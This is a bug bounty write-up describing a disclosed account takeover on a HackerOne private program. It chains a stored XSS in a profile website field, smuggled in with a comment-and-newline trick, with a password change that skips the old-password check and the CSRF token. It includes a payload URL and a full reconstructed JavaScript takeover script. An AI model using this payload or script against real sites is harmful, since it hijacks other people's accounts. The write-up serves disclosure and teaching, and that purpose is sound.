Hello 😀 Everyone,
It had been a long time since I got a good bug and a bounty too :3, so after an OWASP meetup where I met many leet bounty hunters I felt motivated to do some bug hunting. I started poking around, and this is the story of a simple full account takeover on a HackerOne (h1) private program.
Tags: Cross-Site Request Forgery (CSRF), Cross-Site Scripting (XSS)
1. Stored XSS (requires interaction)
The profile's "website" field ends up inside a JavaScript context on the public profile page, so a value that still looks like a normal URL can be turned into code:
// – begins a single-line comment in JS, so everything after the // of https:// on that line is treated as a comment
https://google.com/?aaaa – the comment itself (the field still passes as an ordinary URL)
%0a – a URL-encoded newline, which ends the single-line comment so whatever follows it runs as JavaScript
It got saved on my profile. But it required the victim to click the website link on the attacker's profile page (which was publicly accessible) after being sent that page, so that is how I got a simple XSS with an easy bypass. Before reporting I decided to go further and played around a little more, and I found that the "Change Password" functionality does not ask for the user's old password. That was pretty awesome to exploit 😀 with the XSS we already had.
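As an added example (not code from the original write-up), the following shows what the JavaScript parser does with a value like the one above. It assumes the website value is inlined unescaped at statement position in a script block; the write-up does not show the vulnerable template, so that part is a stand-in.

```javascript
// Added example, not code from the original write-up: why a profile "website"
// value that starts with https:// can smuggle JavaScript into a page that
// inlines the value unescaped inside a script context. The real template of
// the vulnerable site is not shown in the write-up; this only models how the
// JavaScript parser sees the inlined value.

// The field is stored URL-encoded; %0a decodes to a newline.
function decodeField(encoded) {
  return decodeURIComponent(encoded);
}

// Run the decoded value as if it had been inlined at statement position in a
// script block (assumption). `result` starts out untouched; injected code
// that overwrites it proves that it executed.
function runAsInlinedScript(decoded) {
  const body = "var result = 'nothing ran';\n" + decoded + "\nreturn result;";
  return new Function(body)();
}

// Hardened variant: serialize the value as a JSON string literal so the
// newline becomes "\n" and the URL can only ever be data. (In a real HTML
// page also escape "<" as \u003c so "</script>" cannot close the block.)
function runAsInlinedStringLiteral(decoded) {
  const body =
    "var result = 'nothing ran';\nvar site = " + JSON.stringify(decoded) + ";\nreturn result;";
  return new Function(body)();
}

// Constructed inputs. `https:` parses as a JavaScript label and
// `//google.com/?aaaa` as a line comment, so nothing after it on the same
// line can run; only a newline (%0a) terminates the comment.
const HARMLESS_URL = "https://google.com/?aaaa";
const SAME_LINE_ATTEMPT = "https://google.com/?aaaa%20result%20=%20'injected';";
const XSS_PAYLOAD = "https://google.com/?aaaa%0aresult%20=%20'injected';";

console.log(runAsInlinedScript(decodeField(HARMLESS_URL)));        // nothing ran
console.log(runAsInlinedScript(decodeField(SAME_LINE_ATTEMPT)));   // nothing ran
console.log(runAsInlinedScript(decodeField(XSS_PAYLOAD)));         // injected
console.log(runAsInlinedStringLiteral(decodeField(XSS_PAYLOAD)));  // nothing ran
```

The second input shows why the newline matters: without it the injected statement is swallowed by the comment that `https://` opened, exactly as the `//` and `%0a` notes above describe.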
Even though I had an XSS, I decided to check whether an anti-CSRF token was present (not that it mattered much, since we can grab the token with the XSS using XHR). I wanted to see whether the CSRF token is actually validated on the server side, so all I did was remove the authenticity_token parameter from the form 😀 and boom! the password got updated without it.
2. Full Account Takeover
So, combining the XSS with the missing check on the user's old password, I created a POC that takes over the victim's account with just a click on the website link on the attacker's profile. All we need is that the victim is logged into their account.
Earlier, while changing the password, I saw that the form was submitted to an endpoint containing a unique user id that was not publicly known,
so we just needed to grab the user id, and since the CSRF token is not validated we don't need to grab that.
So I made an XHR request to /account (various other endpoints also contained the user_id in their source) to find the victim's user_id, grabbed it, and submitted the password change form with that user_id:
var http = new XMLHttpRequest(); // same-origin request to /account, sent with the victim's session cookie
var parser = new DOMParser();    // used to parse the returned HTML and pull out the user_id
in the website URL and updated my (attacker's) profile.
Now all the victim had to do was click on the attacker's website link and BOOM! their password got changed to 'my1337pass'.
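As an added example (a reconstruction, not the author's POC, of which only the two declarations above are shown), here is the whole chain as it would run in the logged-in victim's browser. The write-up gives only /account, the user_id parameter and the new password, so the id's location in the HTML, the path of the password change endpoint and the form field names are assumptions; the authenticity_token is left out on purpose because the write-up found it is not validated.

```javascript
// Added example, not the author's own POC: a reconstruction of the takeover
// chain the write-up describes, hosted on the attacker's page and run in the
// logged-in victim's browser. Assumptions, because the write-up does not
// give them: /account carries the victim's id as
// <input name="user_id" value="...">, and the password change form posts to
// /users/<user_id>/password with fields "password" and
// "password_confirmation". No authenticity_token is sent, since the write-up
// found it is not validated server-side.

const ACCOUNT_PAGE = "/account";
const NEW_PASSWORD = "my1337pass";

// Step 1: pull the victim's user_id out of the /account HTML. (The original
// used DOMParser; a regex keeps this step runnable outside a browser.)
function extractUserId(html) {
  const m = html.match(/name="user_id"\s+value="([^"]+)"/);
  return m ? m[1] : null;
}

// Step 2: the endpoint with the non-public user id baked into its path
// (assumed layout).
function changePasswordEndpoint(userId) {
  return "/users/" + encodeURIComponent(userId) + "/password";
}

// Step 3: the form body, with no CSRF token and no old password.
function buildChangeBody(userId, newPassword) {
  const params = new URLSearchParams();
  params.set("user_id", userId);
  params.set("password", newPassword);
  params.set("password_confirmation", newPassword);
  return params.toString();
}

// Driver that runs in the victim's browser: same-origin XHRs carry the
// victim's session cookie automatically, so no credentials are needed.
function runTakeover() {
  const http = new XMLHttpRequest();
  http.open("GET", ACCOUNT_PAGE);
  http.onload = function () {
    const userId = extractUserId(http.responseText);
    if (userId === null) return; // not logged in, or page layout differs
    const post = new XMLHttpRequest();
    post.open("POST", changePasswordEndpoint(userId));
    post.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    post.send(buildChangeBody(userId, NEW_PASSWORD));
  };
  http.send();
}

// Constructed stand-in for the victim's /account response, used to
// exercise the parsing step offline.
const SAMPLE_ACCOUNT_HTML =
  '<form action="/account"><input type="hidden" name="user_id" value="48213">' +
  '<input name="email" value="victim@example.com"></form>';

if (typeof XMLHttpRequest !== "undefined") {
  runTakeover();
} else {
  console.log(extractUserId(SAMPLE_ACCOUNT_HTML)); // 48213
  console.log(buildChangeBody("48213", NEW_PASSWORD));
}
```

Either of the two server-side checks the write-up found missing would break this chain on its own: requiring the current password in the change form, or rejecting a request whose authenticity_token is absent or invalid.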
I got a fair enough bounty :D.
Thanks to all the awesome infosec people who share their knowledge.